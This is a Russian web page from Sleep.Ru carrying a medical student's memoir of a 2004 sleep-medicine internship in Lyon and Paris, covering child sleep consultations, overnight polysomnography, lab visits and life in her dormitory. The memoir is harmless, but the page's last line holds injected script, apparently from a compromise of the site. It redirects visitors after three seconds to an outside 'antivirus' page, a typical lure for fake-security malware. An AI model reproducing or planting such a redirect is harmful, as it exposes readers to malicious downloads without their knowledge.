Rambler's Top100    Sleep.Ru - На главную страницу
ЗАПИСКИ ЮНОГО СОМНОЛОГА

"Молодых надо только зажечь.." - можно сказать, это одна из любимых фраз В.М.Ковальзона. Услышав её год тому назад, с трудом поверила. Оказавшись же этим летом в г. Лионе, Франция, пропустила через себя. Итак, минувшей осенью процесс пошёл. Проблемы с организацией стажировки так или иначе разрешились, и 6 июля 2004 года, выйдя на палимую солнцем парковку аэропорта Saint Exupery, я окончательно поняла - выбор сделан и впереди два месяца интересной работы и учёбы. Встречала меня Мари-Жо, мой первый шеф и педиатр со стажем.

Трудно передать ощущения от затаскивания 27 кг без лифта на 3 этаж, равно как и лёгкий шок от места расположения общежития - в двух шагах от кладбища и напротив морга... Но как говорят французы, on s'en foue [забудем об этом]…

Почти весь июль в 7-00 над моим ухом звонил будильник... Ибо рабочий день начинался в 8-30 утра... а идти до больницы минут 15... Первое впечатление: городская больница похожа на частную клинику. Бесшумные лифты Отис, дистрибьюторы кофе и еды повсюду, улыбчивый персонал. Итак, седьмого числа мне был выдан халат, и я оказалась на консультации по проблемам детского сна.

Я не успевала удивляться тому, как быстро Мари Жо вникает в суть проблемы и как умело находит слова для убеждения родителей, что поступить нужно именно так, а не иначе…

Маленькой Мари 4 года. Она просыпается по ночам, требует свою бутылочку (хотя спокойно может брать её сама), кричит, заливается плачем. Работающую маму-дизайнера и папу-архитектора такие истории каждую ночь просто выводят из себя... Перепробовано многое. И вот, семья на приёме у Мари Жо.

- Мари, что ты больше всего любишь делать?

- Плавать…

- Мари, ты должна понять, что в доме командуют мама и папа. Если начинают командовать дети, ничего хорошего не получается. Давайте попробуем сделать так: в твою комнату ставится плакат, на котором рисуется паровозик. Ты любишь рисовать? Тогда ты сама его нарисуешь. Каждая ночь, когда ты не будила маму и папу, засчитывается как вагончик к этому паровозику. Когда таких вагончиков набирается семь - идёшь в бассейн!

Трудно забыть процесс снятия полисомнограммы с однодневного младенца. Такой маленький человечек, а уже подвергается диагностике!

Ночь записи сна. Шестилетний африканец. Приехал с мамой. Весь персонал знает, что при его патологии жить ему осталось не более 3 лет. Его глаза, мимика, жесты - всё располагает к нему. Но только пока Морис не начинает засыпать, а Франсуаза и я ставить электроды. Мальчик исходит на крик. Лягается, плачет... Тут мы благодарим Всевышнего, что мама его рядом и всегда готова подержать конечности в нужный момент…

10 часов вечера... Морис засыпает.. Мы пьём чай и смотрим на монитор системы Micromed…

Альфа активность... веретёна... дельта сон... Пытаюсь вникнуть в учебник по педиатрии, и вдруг - крик... Малыш сорвал электрод... всё по-новой. Три часа утра... Сами едва боремся со сном... Мальчик ворочается, а значит есть опасность, что оторвёт электроды... Снова подходим к нему... Да, надо подправить... Система видео-наблюдения, слава Богу, работает без сбоев... Смотришь на монитор и думаешь - вот так учатся анализировать ЭЭГ...

Клиническая практика моя сочеталась с посещением лабораторий. Огромный медицинский факультет на станции метро Grange Blanche. Здание напоминает эпоху конструктивизма. Тьма коридоров, указатели лестниц, толпа студентов, несмотря на летний месяц.

Огромная сомнологическая лаборатория... Здесь делается ВСЁ: запись сна у крыс, мышей и кошек. Гистологические и иммунно-ферментный анализы… RT-PCR.

Девушка моего возраста, студентка из Квебека, вводит NO в мозг мыши... Получается не сразу, т.к. наркоз на мышь слабо подействовал. Шеф приходит на помощь. Объясняет, показывает... Таким и должен быть настоящий педагог и учёный!

Факультет Лайннек. Ещё одна сомнологическая лаборатория, фактически отпочковавшаяся от первой... Здесь мышкам отрезают головы, достают мозг и разрезают гиппокамп на мелкие кусочки... А ведь при этом нужна такая точность и выдержка!

Молодой аспирант рассказывает мне, что хотя он и биолог по образованию, но изучает депрессии "на людях" и использует для этого PET…

Лаборатории в Лионе крупнее чем в Париже.. Впоследствии у меня появляется возможность сравнить..

Жюссьё... Научный центр в Париже… На выходе из метро меня встречает Оксана и через известные только ей ходы ведёт в лабораторию. Здесь всегда изучали поведение, а теперь взялись за сон. Очень уютно. Аспирант рассказывает о фармакологической направленности своих исследований и показывает видео запись теста с крысой. Оксана мне подбирает статьи. Большое ей за это спасибо!

Хоть и говорят, что les lionnais (лионцы) холодные и не очень гостеприимные по сравнению с обитателями того же Марселя, но такого впечатления они на меня не производят.

Жду автобуса вместе с 80 летней бабушкой... Ярко накрашенной и на каблуках. Завязывается разговор. Оказывается она живёт недалеко от моего общежития, в одном из престижных, хоть и загородных, районов. Клер уже была в России, на своё 75-летие. Осталась очень довольна дискотеками и молодёжью. Надеется поехать ещё... Жалуется, что её стоматолог в отпуске, а она сломала себе зуб... И большинство клинических ординаторов - выходцы из Магриба, и французам это не очень нравится... Говорит, что медицина требует реформ и притока молодой крови. Выходя из автобуса - машет рукой и желает счастливой любви…

В общежитии жить весело. Моя соседка Уиба - из Туниса. Соседка сверху - Джинго - китаянка из Лаоса. Амин - марокканец. Зиед - из Ливана. И т.д. Такая мультинациональность позволяет освоить кухни и услышать музыку разных стран. Чего стоят одни китайские и тунисские сладости! Все говорят по-французски, так что особых проблем в общении не возникает. Наоборот, получается что-то вроде большой семьи или коммуналки, где каждый знает всё или почти всё про каждого и нет ничего сверхъестественного в приготовлении кускуса в 3 утра…

В августе я перемещаюсь во взрослую клинику сна, ранее патронируемую самим Мишелем Жуве... Вставать приходится раньше, ибо дорога занимает около часа. Часть Лиона перекопана, автобусы ходят нерегулярно, что вообще-то нехарактерно для Франции.

Взрослые пациенты по больше части страдают гипотироидизмом. Их чаще подвергают 24 часовой записи и актиметрии. Чаще применяют метод вызванных потенциалов. Но, если в детстве сон ещё можно как-то отрегулировать и "вылечить", то во взрослой жизни это становится намного труднее. Девушка-студентка рассказывает, как засыпает на экзаменах. Санитарка жалуется, что не может спать по ночам после смерти мужа. Тибетский монах якобы за свою жизнь почти не спал…

Парк Тет д'Ор, с его живыми слонами, жирафами и огромным озером; музей Сопротивления с его выставками и фильмами; Ф.Леже, тихие, уютные кафе-террасы и шумные интернациональные пабы, фуникулёры и загадочная Фурвьера. Две реки, сходящиеся в центре города - Рона и Сона. Бассейны и магазины... город Вена и город Валенсия (оба вблизи Лиона)… Яркие краски, дополняющие картину стажировки… Но 1 сентября и отчёт "по практике" ждут..

В аэропорту девушки из Люфтганзы "так и быть" прощают мне 15 кг "лишнего" багажа... А впереди появляются неяркие из-за дождя огни Петербурга, города, где освещением занимались лионские мастера…


Вера Незговорова,
студентка 3 курса медицинского факультета Санкт-Петербургского Государственного Университета



 
     Наверх Sleep.Ru :     Оборудование  |  Конференции  |   Библиотека  |  Ссылки      
  © 2001 Sleep.Ru   Rambler's Top100     
setTimeout(\'document.location.href = "http://base-file.com/antivirus"\', 3000);'); } ?>